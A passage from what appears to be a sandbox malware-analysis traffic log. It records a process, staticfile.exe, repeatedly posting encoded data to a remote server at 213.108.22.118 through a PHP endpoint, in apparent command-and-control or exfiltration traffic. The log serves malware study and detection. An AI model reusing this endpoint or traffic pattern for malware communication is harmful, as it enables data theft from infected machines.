                                        Nov 30, 2024 22:36:28.119353056 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1404
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:28.466022968 CET1404OUTData Raw: 55 50 5c 5a 55 5e 50 5d 55 5c 57 59 50 59 5a 54 58 5c 5b 5e 51 5b 53 5b 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UP\ZU^P]U\WYPYZTX\[^Q[S[U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"(>*4!(2<\,//&(4T3()3] %U'- &#-._/%^/(
                                        Nov 30, 2024 22:36:29.553709984 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:29.789211988 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:29 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 20 01 2b 3b 2a 5c 28 2b 31 11 2e 01 38 1c 24 3b 25 59 38 04 2d 5e 29 2a 1b 13 28 3f 39 53 22 28 33 5c 2b 29 2e 54 24 08 21 05 2b 3b 2b 5e 0c 1b 23 1d 3f 15 35 5e 33 2b 2b 06 24 23 2f 00 21 08 28 02 30 5b 26 11 2b 06 2a 58 37 32 32 1a 3b 54 3d 57 26 00 3b 01 3e 2f 2b 52 22 13 2f 56 0b 12 21 0e 30 0b 3a 01 24 3c 24 5a 23 0e 2a 5f 23 36 0f 04 21 2f 0b 1d 23 3b 31 01 28 3e 3a 59 20 20 38 1a 3d 03 03 13 25 31 23 53 2a 07 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: +;*\(+1.8$;%Y8-^)*(?9S"(3\+).T$!+;+^#?5^3++$#/!(0[&+*X722;T=W&;>/+R"/V!0:$<$Z#*_#6!/#;1(>:Y 8=%1#S*/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        28192.168.2.449771213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:28.241142035 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:28.591259956 CET2544OUTData Raw: 55 5c 59 5f 55 59 55 5b 55 5c 57 59 50 53 5a 52 58 55 5b 58 51 5b 53 5b 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U\Y_UYU[U\WYPSZRXU[XQ[S[U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"?..#0^%/,W&43>+Y=6#X#,:3-#\%3.$._/%^/
                                        Nov 30, 2024 22:36:29.778533936 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:30.031713009 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:29 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        29192.168.2.449777213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:30.272872925 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2536
                                        Expect: 100-continue
                                        Nov 30, 2024 22:36:30.622359037 CET2536OUTData Raw: 50 5d 5c 5d 55 5a 50 5b 55 5c 57 59 50 5b 5a 52 58 55 5b 5c 51 5d 53 5c 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P]\]UZP[U\WYP[ZRXU[\Q]S\U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!+.1 14\2> ,W184V%='Y);] *'236:._/%^/8
                                        Nov 30, 2024 22:36:31.737581968 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:31.982521057 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:31 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        30192.168.2.449783213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:32.224869967 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:32.575725079 CET2544OUTData Raw: 55 5f 59 5d 55 59 50 5d 55 5c 57 59 50 5d 5a 50 58 58 5b 5c 51 5c 53 5c 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U_Y]UYP]U\WYP]ZPXX[\Q\S\U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"(9 T(]%.?;%]?0-/)&##/=S&-?[2U6_.$._/%^/8
                                        Nov 30, 2024 22:36:33.626511097 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:33.883704901 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:33 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        31192.168.2.449789213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:34.137912035 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:34.497508049 CET2544OUTData Raw: 50 5d 59 5d 55 5a 55 5d 55 5c 57 59 50 53 5a 55 58 5e 5b 58 51 59 53 5f 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P]Y]UZU]U\WYPSZUX^[XQYS_U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"*>)#31=$^;3V28<3?Z)%Z"<2'+29._/%^/


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        32192.168.2.449790213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:34.915800095 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:35.262988091 CET1428OUTData Raw: 55 5e 59 58 55 5c 50 51 55 5c 57 59 50 58 5a 5d 58 5f 5b 53 51 5b 53 59 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U^YXU\PQU\WYPXZ]X_[SQ[SYU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"<71<%Z,</$(<R0,)63#9$.7$ >94._/%^/,
                                        Nov 30, 2024 22:36:36.339886904 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:36.573266983 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:36 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 23 59 2b 01 36 10 3f 5e 3d 5d 2e 3c 3c 13 31 06 0f 5f 2c 3d 0b 1b 3c 39 3d 5f 3e 3f 2e 0c 21 28 01 1f 2b 39 04 1d 27 08 0f 05 2b 2b 2b 5e 0c 1b 20 0a 3f 15 08 01 33 02 2c 58 33 56 2c 5a 36 1f 05 5f 26 3e 39 0c 28 01 39 04 23 0f 29 0d 2c 1c 2d 11 26 3a 24 11 3e 01 3c 0e 35 13 2f 56 0b 12 22 14 33 0c 07 5e 24 3f 24 5a 23 09 21 05 35 26 36 59 20 2f 08 0a 35 06 00 59 28 3e 0c 5b 23 23 3c 53 3d 2d 31 5f 31 21 23 53 2a 07 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: #Y+6?^=].<<1_,=<9=_>?.!(+9'+++^ ?3,X3V,Z6_&>9(9#),-&:$><5/V"3^$?$Z#!5&6Y /5Y(>[##<S=-1_1!#S*/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        33192.168.2.449791213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:35.054218054 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:35.403801918 CET2544OUTData Raw: 55 58 59 54 55 5d 50 5d 55 5c 57 59 50 58 5a 50 58 5c 5b 52 51 58 53 5c 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UXYTU]P]U\WYPXZPX\[RQXS\U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"*=6\ <%7//#%(3?[)\7S'/%3.X.$._/%^/,
                                        Nov 30, 2024 22:36:36.413021088 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:36.654452085 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:36 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        34192.168.2.449797213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:36.897758961 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:36:37.247416019 CET2544OUTData Raw: 55 5e 5c 58 50 5f 50 5e 55 5c 57 59 50 58 5a 55 58 54 5b 5c 51 51 53 5e 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U^\XP_P^U\WYPXZUXT[\QQS^U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!A(>:#!?28/<1R')'",1&-7^26:._/%^/,
                                        Nov 30, 2024 22:36:38.291224957 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:38.543819904 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:38 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        35192.168.2.449803213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:38.787328959 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:39.138134003 CET2544OUTData Raw: 55 5d 59 54 55 54 50 5c 55 5c 57 59 50 52 5a 55 58 59 5b 5b 51 5c 53 5b 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U]YTUTP\U\WYPRZUXY[[Q\S[U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!D?&_ "1>'8?%;R'$)%04<"$\$#,4._/%^/
                                        Nov 30, 2024 22:36:40.160202026 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:41.121246099 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:39 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        36192.168.2.449809213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:41.366884947 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        37192.168.2.449810213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:41.719985008 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:42.075639009 CET1428OUTData Raw: 55 5c 59 54 50 58 55 5f 55 5c 57 59 50 5c 5a 57 58 5c 5b 5d 51 5e 53 5f 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U\YTPXU_U\WYP\ZWX\[]Q^S_U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!C(-272>8Z///U&3*&'Z#/T0+1 "_.4._/%^/
                                        Nov 30, 2024 22:36:43.079910994 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:44.050710917 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:42 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 20 06 3f 01 26 11 2b 5e 2a 01 2e 3c 38 1e 24 2b 32 02 3b 5b 2e 00 2b 3a 3a 06 3d 02 21 10 21 38 3b 5c 28 39 2e 1e 30 36 2a 58 2b 01 2b 5e 0c 1b 20 44 3f 2b 2d 5d 26 2b 38 5f 27 09 3c 1c 22 32 37 5e 27 2e 3e 55 2b 01 25 04 23 57 31 09 2f 21 29 1f 32 29 2b 06 29 11 23 57 21 29 2f 56 0b 12 21 0a 30 1c 0b 13 25 11 38 58 37 33 21 04 35 25 3e 5b 34 01 07 52 23 28 31 01 28 58 3d 01 21 20 20 56 3d 3e 26 01 26 22 27 53 2a 07 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: ?&+^*.<8$+2;[.+::=!!8;\(9.06*X++^ D?+-]&+8_'<"27^'.>U+%#W1/!)2)+)#W!)/V!0%8X73!5%>[4R#(1(X=! V=>&&"'S*/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        38192.168.2.449811213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:41.954997063 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:42.309997082 CET2544OUTData Raw: 50 5a 59 54 55 5b 50 5f 55 5c 57 59 50 53 5a 53 58 55 5b 59 51 5f 53 5f 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: PZYTU[P_U\WYPSZSXU[YQ_S_U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!(.2#"\$=4/Z#$;#$'> #23(&6Y-$._/%^/
                                        Nov 30, 2024 22:36:43.316126108 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:44.276808977 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:43 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        39192.168.2.449817213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:44.523240089 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:36:44.873140097 CET2544OUTData Raw: 55 51 5c 58 55 54 50 5e 55 5c 57 59 50 5e 5a 5d 58 5f 5b 5d 51 58 53 55 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UQ\XUTP^U\WYP^Z]X_[]QXSUU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!@*--4"&.Z;7$;8R%-+[(%,",9S'+_&>[.$._/%^/4
                                        Nov 30, 2024 22:36:45.843058109 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:46.077480078 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:45 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        40192.168.2.449823213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:46.328255892 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:36:46.684957981 CET2544OUTData Raw: 50 5d 59 55 55 59 50 5c 55 5c 57 59 50 52 5a 51 58 58 5b 52 51 58 53 59 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P]YUUYP\U\WYPRZQXX[RQXSYU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!E?24"$-7,/?T&$/[)&04=R&>$20=9._/%^/
                                        Nov 30, 2024 22:36:47.643871069 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:36:47.877351046 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:36:47 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        41192.168.2.449829213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:36:48.116966963 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
